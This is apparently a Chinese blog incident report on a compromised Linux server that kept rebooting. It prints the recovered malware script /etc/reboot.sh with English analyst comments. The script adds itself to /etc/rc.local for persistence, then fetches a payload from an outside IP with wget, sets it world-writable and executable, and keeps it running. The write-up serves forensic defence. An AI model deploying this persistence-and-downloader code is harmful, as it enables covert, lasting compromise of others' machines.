标签:linux入侵
现象:服务器无故重启。
查看原因:
# last | head -15
r00t tty1 Thu May 21 04:57 - 04:58 (00:00)
reboot system boot 2.6.32-358.el6.x Thu May 21 04:56 - 04:58 (00:01)
r00t tty1 Thu May 21 04:52 - down (00:03)
r00t tty1 Thu May 21 04:42 - 04:52 (00:09)
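原因:服务器被入侵,并被植入了 reboot.sh 脚本(内容见下)。需要注意,下面的脚本本身不包含任何重启命令:它把自己写入 /etc/rc.local 实现开机自启,并每 60 秒检查一次,负责下载并守护 /etc/restat。因此重启更可能来自 restat 程序,或 last 输出中 r00t 账户在 tty1 上的操作;排查时应一并检查该账户、/etc/rc.local、/etc/reboot.sh 和 /etc/restat。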
#!/bin/bash
# Sample recovered from the compromised host (/etc/reboot.sh). Annotated for
# analysis only; the code lines are left exactly as published.
#
# What the script does, as visible below:
#   1. Persistence: makes sure /etc/rc.local contains "sh /etc/reboot.sh &".
#   2. Watchdog: every 60 seconds checks for a running /etc/restat, fetches
#      the file over HTTP if it is missing, starts it if it is not running,
#      and kills surplus instances.
# Nothing in this script issues a reboot or shutdown.
#
# Host indicators visible in this sample: the "sh /etc/reboot.sh &" line in
# /etc/rc.local, the files /etc/reboot.sh and /etc/restat, and an outbound
# HTTP request to the host:port on the wget line below.
# Cleanup order matters: while this loop is alive it re-downloads and
# restarts /etc/restat within 60 seconds, so stop this script and remove the
# rc.local entry before removing the payload.

# --- Persistence check ---
# Compares the /etc/rc.local lines mentioning /etc/reboot.sh with the exact
# launcher string. (grep -v grep here filters file content, not a process
# list, so it only drops lines containing the word "grep".)
if [ "sh /etc/reboot.sh &" = "$(cat /etc/rc.local | grep /etc/reboot.sh | grep -v grep)" ]; then
echo ""
else
# Not an exact single-line match: append the launcher so the script is
# started from rc.local.
echo "sh /etc/reboot.sh &" >> /etc/rc.local
fi
# --- Watchdog loop ---
# [ 1 ] tests a non-empty string, so this loop never ends on its own.
while [ 1 ]; do
# Number of ps lines that mention /etc/restat (the grep itself excluded).
restat_killn=$(ps aux | grep "/etc/restat" | grep -v grep | wc -l)
if [[ $restat_killn -eq 0 ]]; then
# No running instance: re-fetch the file if it is gone, then start it.
if [ ! -f "/etc/restat" ]; then
if [ -f "/usr/bin/wget" ]; then
# Uses a private copy of wget placed in the current working directory.
cp /usr/bin/wget .
chmod +x wget
#./wget -P . http://115.230.127.95:523/restat
# Downloads the payload into /etc/ with all output discarded.
./wget -P /etc/ http://115.230.127.95:523/restat &> /dev/null
# Runs whether or not the download succeeded; makes the file
# world-readable, -writable and -executable.
chmod 777 /etc/restat
# Removes the private wget copy again.
rm wget -rf
else
echo "No wget"
fi
fi
# Started in the background even if the download above failed or was skipped.
/etc/restat &
#./restat &
elif [[ $restat_killn -gt 1 ]]; then
# More than one instance: walk the PIDs and keep one alive.
# The pattern here is "restat", broader than the "/etc/restat" used for the
# count above, so unrelated processes with that substring are also listed.
# NOTE(review): the quotes around the awk program are typographic quotes,
# presumably introduced by the blog rendering; the deployed script would
# have needed ASCII single quotes for awk to receive {print $2}.
for killed in $(ps aux | grep "restat" | grep -v grep | awk ‘{print $2}‘); do
restat_killn=$(($restat_killn-1))
# The PID on which the counter reaches 1 is spared; every other listed PID
# receives SIGKILL.
if [[ $restat_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
# Exactly one instance running: nothing to do.
echo ""
fi
# Re-check once a minute.
sleep 60
# NOTE(review): the text after "done" on the next line is the blog's
# attribution footer, fused onto the script's last line by the page
# extraction; it is not part of the sample.
done本文出自 “传奇库子” 博客,请务必保留此出处http://chason.blog.51cto.com/9078447/1653911
原文地址:http://chason.blog.51cto.com/9078447/1653911